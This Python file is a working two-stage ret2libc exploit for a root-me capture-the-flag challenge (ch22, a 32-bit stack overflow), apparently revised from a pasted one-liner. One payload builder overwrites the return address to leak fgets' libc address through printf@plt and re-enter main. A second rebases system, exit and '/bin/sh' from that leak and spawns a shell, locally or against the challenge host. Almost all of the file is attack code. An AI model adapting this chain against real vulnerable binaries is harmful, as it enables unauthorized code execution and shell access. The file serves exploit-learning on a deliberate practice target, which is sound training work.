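#!/usr/bin/env python
"""Two-stage ret2libc exploit for root-me app-systeme ch22 (32-bit stack overflow).

The paste ran this as a ``python -c '...'`` one-liner on the challenge host;
as a file it is driven the same way:

    app-systeme-ch22@challenge03:~$ python exploit.py            # local binary
    app-systeme-ch22@challenge03:~$ python exploit.py --remote   # challenge03.root-me.org:56522

Stage 1 overwrites the saved return address (48 bytes into the buffer) with
printf@plt and passes fgets' GOT entry as its argument, so the process prints
the raw little-endian bytes of fgets' resolved libc address, then returns into
main() for a second read.  Stage 2 rebases system()/exit()/"/bin/sh" from that
leak and overwrites the return address again with a system("/bin/sh") frame.
The paste left stage 2 commented out and re-sent the leak payload instead, so
it never reached a shell; that is the main fix here.

pwntools is only needed at run time; the payload/offset helpers are pure
Python so they can be sanity-checked without the binary.  Addresses the
paste defined but never used (bss 0x0804a020, stdin 0x0804a024, size 0x10)
were dropped.
"""
import struct
import sys

BINARY = "/challenge/app-systeme/ch22/ch22"
REMOTE_HOST = "challenge03.root-me.org"
REMOTE_PORT = 56522

# Distance from the start of the overflowed buffer to the saved return address.
SLED_LEN = 48
# "pop ebx ; ret"-style gadget in ch22 used to discard printf's argument.
# (0x0804859f, a "call eax" gadget, was also noted in the paste but is unused.)
GADGET_POP_EBX = 0x08048573

# Offsets of libc symbols relative to fgets, as measured on the challenge
# host's libc build.  They are only valid for that exact libc: if the leak
# looks sane but no shell appears, recompute them from the real library
# (ELF("<libc>").symbols["system"] - ELF("<libc>").symbols["fgets"], or a
# libc-database lookup of the leaked address) instead of guessing.
LIBC_OFFSETS = {
    "system": -0x28db0,
    "exit": -0x35be0,
    "printf": -0x14ce0,
    "/bin/sh": 0x11811F,
}

_ADDR_MASK = 0xffffffff


def _p32(value):
    """Pack a 32-bit little-endian address (what pwntools' p32 does for i386)."""
    return struct.pack("<I", value & _ADDR_MASK)


def leak_payload(printf_plt, pop_ebx, fgets_got, main_addr, sled_len=SLED_LEN):
    """Build the stage-1 overflow: printf(fgets_got), then return into main().

    Stack layout after the sled, exactly as the paste had it:
    [printf@plt][pop_ebx][fgets_got][pop_ebx][main].  printf sees pop_ebx as
    its return address and fgets_got as its first argument and prints that
    address as a C string, i.e. the bytes of fgets' libc address.

    NOTE(review): how many values the gadget pops decides whether the second
    pop_ebx slot is consumed or executed; the layout is kept as pasted rather
    than "simplified" from the gadget's name -- confirm it under gdb before
    changing it.  printf also treats the leaked bytes as a format string, so
    an address containing 0x25 ('%') comes out mangled; just rerun then.
    """
    chain = [printf_plt, pop_ebx, fgets_got, pop_ebx, main_addr]
    return b"n" * sled_len + b"".join(_p32(addr) for addr in chain)


def shell_payload(system_addr, exit_addr, binsh_addr, sled_len=SLED_LEN):
    """Build the stage-2 overflow: a plain system("/bin/sh") frame.

    Layout: [system][exit][binsh].  exit() is system's fake return address so
    the process ends cleanly once the shell exits.  The paste's commented-out
    variant (system, pop_ebx, binsh, main) also spawns the shell, but this
    one does not depend on the gadget's pop count.
    """
    frame = (system_addr, exit_addr, binsh_addr)
    return b"n" * sled_len + b"".join(_p32(addr) for addr in frame)


def parse_leak(line):
    """Decode the little-endian address printed by stage 1 from *line*.

    Raises ValueError with the offending data instead of the bare struct
    error u32() would give when the read timed out (empty line) or the chain
    crashed before printf ran.
    """
    if len(line) < 4:
        raise ValueError("stage-1 leak too short (%r); did the chain reach printf?" % (line,))
    return struct.unpack("<I", line[:4])[0]


def libc_addresses(leak_fgets, offsets=None):
    """Rebase every symbol in *offsets* (default LIBC_OFFSETS) from the leaked fgets address."""
    if offsets is None:
        offsets = LIBC_OFFSETS
    return {name: (leak_fgets + delta) & _ADDR_MASK for name, delta in offsets.items()}


def main(argv=None):
    """Run both stages against the local binary, or the service when --remote is given."""
    # pwntools only drives the target; importing it here keeps the pure
    # helpers above importable without it.
    from pwn import ELF, context, log, process, remote

    args = sys.argv[1:] if argv is None else argv

    elf = ELF(BINARY)                   # the local copy supplies symbols even for --remote
    context.binary = elf
    context.log_level = "debug"         # the paste used raw level 2, which prints everything

    main_addr = elf.symbols["main"]
    printf_plt = elf.plt["printf"]      # explicit PLT/GOT tables instead of the "got.fgets" symbol alias
    fgets_got = elf.got["fgets"]

    if "--remote" in args:
        io = remote(REMOTE_HOST, REMOTE_PORT)
    else:
        io = process(BINARY)            # swap for gdb.debug(BINARY) to single-step the chain

    # Stage 1: leak fgets' libc address.  The recv/sendline rhythm mirrors the
    # paste: one line comes back after the payload, and the empty line that
    # follows presumably makes the re-entered main() emit the output that
    # terminates the (newline-less) printf leak.  Adjust if the chatter differs.
    io.recv(timeout=1)
    io.sendline(leak_payload(printf_plt, GADGET_POP_EBX, fgets_got, main_addr))
    io.recvline(timeout=1)
    io.sendline(b"")
    line = io.recvline(timeout=1)
    log.info(repr(line))

    leak_fgets = parse_leak(line)
    libc = libc_addresses(leak_fgets)
    log.info("Leak got fgets: %s" % hex(leak_fgets))
    log.info("Leak calculate system: %s" % hex(libc["system"]))
    log.info("Leak /bin/sh: %s" % hex(libc["/bin/sh"]))

    # Stage 2: we are back in main(), so the same overflow now calls system("/bin/sh").
    io.sendline(shell_payload(libc["system"], libc["exit"], libc["/bin/sh"]))
    io.recvline(timeout=1)
    io.sendline(b"")
    io.recvline(timeout=1)
    io.interactive()


if __name__ == "__main__":
    main()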